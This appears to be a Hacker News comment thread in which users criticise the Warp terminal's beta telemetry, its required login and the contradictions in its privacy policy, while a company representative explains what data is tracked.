Exactly. I prefer Emacs–style programs where the number of features grows without end, and everyone customizes the UI and keybindings to make the features they like best easiest to use. Every time someone thinks of a new way that Emacs can make their life easier they can add it to Emacs immediately, without asking for permission or even sending in a pull request. Later, if they think the feature is polished enough and others might find it useful, they can send a pull request either to Emacs or to the Emacs Lisp Package Archive (ELPA), or to MELPA (should they not like the minor licensing restrictions on ELPA), or just post it on EmacsWiki or their blog or Facebook page or whatever for others to copy from.
But for that to work you have to start with something that is both very extensible, and yet is also coherently designed. The extensibility has to be a strong part of that initial design, so that the software is designed to be malleable.
That privacy policy is sketchy. It starts with this-
> Our general philosophy is complete transparency and control of any data leaving your machine. This means that in general any data sharing is opt-in and under the control of the user, and you should be able to remove or export that data from our servers at any time.
They then go on, further down the page, to say that this first paragraph is a complete lie-
> However, for our beta phase, we do send telemetry by default and we do associate it with the logged in user because it makes it much easier to reach out and get feedback when something goes wrong.
It’s a policy - a set of rules. It’s only a problem if you say something and don’t do it. But even then, enforcement is most likely to come from interested parties like payment providers, who generally couldn’t care less as long as it’s not their data that’s compromised.
I remember an iOS email client many years ago that required a Dropbox login for some reason. It made no sense that an email client would require me to log in to a cloud file storage/syncing service - in my mind these two things are completely unrelated. That email client ended up disappearing.
I expect that a terminal program which requires a login to a completely unrelated service will end up meeting the same fate as that email client did.
> I really wanted to like it, too. The screenshots look great
Agreed! Let's just wait for a FOSS alternative to pop up that has a few similar fundamental features. Don't need the cloud-multi-user-account-based stuff.
Among other things, it is disturbing how chatty a lot of things are. (Did you know Apple Mail keeps track of which account you email different people with and wants to send that to configuration.apple.com, even if you have carefully disabled everything Icloud related?)
There's a similar tool for Linux, but I usually keep a networkless VM around for playing with potentially sketchy things.
There is a section about being required by the EU to determine location for VAT collection purposes. If their payment processor can’t determine your location sufficiently, then they have to collect data identifying your location and store it for tax/proof purposes. That’s something they don’t want to ever have to do, obviously.
Yep, I can pay money for a piece of software so important for my workflow, but no telemetry, no login and other stupid stuff even in opt-in/opt-out fashion.
Exactly the same, clicked "comments" as I was downloading it, saw the first comment, deleted the installer.
I'd be supportive of "report issue" buttons (I'd use them, yes), and occasional "Hey, you've used this app for a week/two/month, may we send some telemetry? We need it to better understand how the app is used. Here's the data, is it OK to upload it?" prompts. Yes, as long as I don't see anything sensitive in the payload - it sure is okay, you respect me and I respect you (with bonus points for politely asking); and I'll be sure to reach out if I see anything sensitive.
Phoning home from the get-go for anything but an anonymous update check and requiring some account is a hard "no".
I definitely understand the concerns. For our public beta, we do send telemetry and associate it with the logged in user because it makes it much easier to reach out and get feedback when something goes wrong. But we only track metadata, never console output. For an exhaustive list of events that we track, see here: https://docs.warp.dev/getting-started/privacy#exhaustive-tel.... Once we hit general availability, our plan is to make telemetry completely opt-in and anonymous.
Wow, this is just unbelievable. You don't say anywhere on your privacy page that you are associating this data with specific users.
Everything your company says regarding privacy seems to be a complete lie. You contradict yourselves everywhere. As a security officer, I would never allow any company whose security I run to use your product - even if you fix these issues now, who knows if you're going to lie again in the future.
Trust is hard to regain once lost, and your company definitely blew it here.
This looks very interesting to me, but some of this telemetry is a deal breaker. On your privacy page, it says "Our general philosophy is complete transparency and control of any data leaving your machine." If I have complete control of any data leaving my machine, can I opt to turn off the telemetry entirely?
That's an important callout! By console output, we really mean output from the pseudoterminal, which includes command input and output printed to the terminal.
We don't store any content of _any_ part of a command that's executed in Warp.
That's a ton of data being collected. I would much rather have this submitted during a crash, rather than opt-in/opt-out. I wouldn't want to use a terminal whose data collection crosses the internet every time I use it.
Totally understand if you don't feel comfortable using it!
The reason we don't submit this only during a crash, is because there are a lot of other things we want to know about users like: Which features are they using? Are they sticking to warp as their daily driver? How much time do they spend in the app?
We do want to make the telemetry opt-in after Warp is out of beta.
There are better ways to gather feedback, even if your application is in beta. Most loyal customers will let you know what’s wrong and what features they’re most excited about - that honest feedback is far superior to telemetry data. You can even add a survey form after the application exits to try and maximize the feedback loop.
Totally understand you’re a new venture backed business, however, you most likely are targeting the wrong group of users by automatically sending data over the internet for “no reason”.
> Most loyal customers will let you know what’s wrong and what features they’re most excited about- that honest feedback is far superior than telemetry data
That's just wrong. Very few users, regardless of loyalty, would bother sending feedback. That's why many companies run drives with gift cards or similar as a reward for giving feedback. And even then, you'd get a limited subset of users (loyal, loud, with time to spare) instead of everyone, as with telemetry.
We don’t know about any shells outside of Warp so technically, they could also be using other terminals - but that’s enough info for our product development.
We never track the contents of commands. A full telemetry table is included in our user docs.
I definitely will not try it if the analytics part are not optional, though I am glad to see you're documenting exactly what gets sent. I might consider trying it and even opt-in to the analytics once you make it optional.
At least for EU users, you cannot collect information like this without the explicit consent of those users.
It's 2022 FFS, and still companies are over-stepping the mark - companies behaving like yours are exactly the reason GDPR and ePrivacy etc exist in the first place :/
> I really wanted to like it, too. The screenshots look great
My thoughts exactly. I don't use potential keyloggers on my browser (think grammarly or similar), I'm not going to install a terminal making requests or getting my data as I use it.
You could use a layer 7 firewall for this purpose. I use Little Snitch on macOS and Opensnitch on Linux. Given this application is macOS only right now, I would bet OP used LS since its popular on macOS.
Just FYI, Sentry is an error capturing and reporting tool, not "telemetry". It could potentially be abused to collect "telemetry", but there are far better tools for that, so it'd make little sense IMHO. I've used it extensively for error management in a previous job and it worked very well, correlating with env, release, etc. (it was the self-hosted version, but still). Not affiliated in any way, just a happy "customer" (never paid, so not really a customer).
As a user of Sentry, then, you're also aware of how difficult it is to keep user information out of those errors and stacktraces. Just paths are enough to start leaking information about you and your system that simply shouldn't leak from your terminal to the internet.
Come on. You must realize VS Code and basically every website you use collects telemetry data, which is rarely for anything nefarious except product improvements. If GitHub/Microsoft had released this product, would you be raising the same concerns?
Maybe not but I'd trust Microsoft has a decent security and privacy team working on this more than a startup. What if they're logging the wrong stuff and my data is leaked?
Yeah, but if Microsoft fucks up badly enough I can sue them; startups are less likely to survive a significant breach (especially if the thing being breached is 100% of their product). There's just far less risk.
I use VS Codium for this reason and self host git so yeah for me that's definitely a thing. And I have a ton of stuff to block as much telemetry from other software and websites as I can, including on mobile.
It's not for everyone but yes there are still Don Quixotes like me fighting the army of windmills :)
I suspect the proportion of us here at HN is pretty high too.
A remote system by definition has access to the information you give them, and you should manage that carefully. Meanwhile your filesystem has access to your entire life, heart, and mind: unvarnished, unedited, and unsegregated, with ephemera alongside the deep facts of your mind.
Microsoft is a criminal enterprise that relatively recently got religion to a degree and actually started caring about their image at home, while still facilitating crime and corruption abroad. The fact that many are stupid enough to trust them with their data does not imply that this is a reasonable choice.
Unless you know something about the protocol that I don't (quite possible), it's not silent: all your devices get a "new device registered to iMessage" dialog box.
Since Apple operates the key service and there is no key transparency mechanism, they could certainly do it (technically) with only a server side change.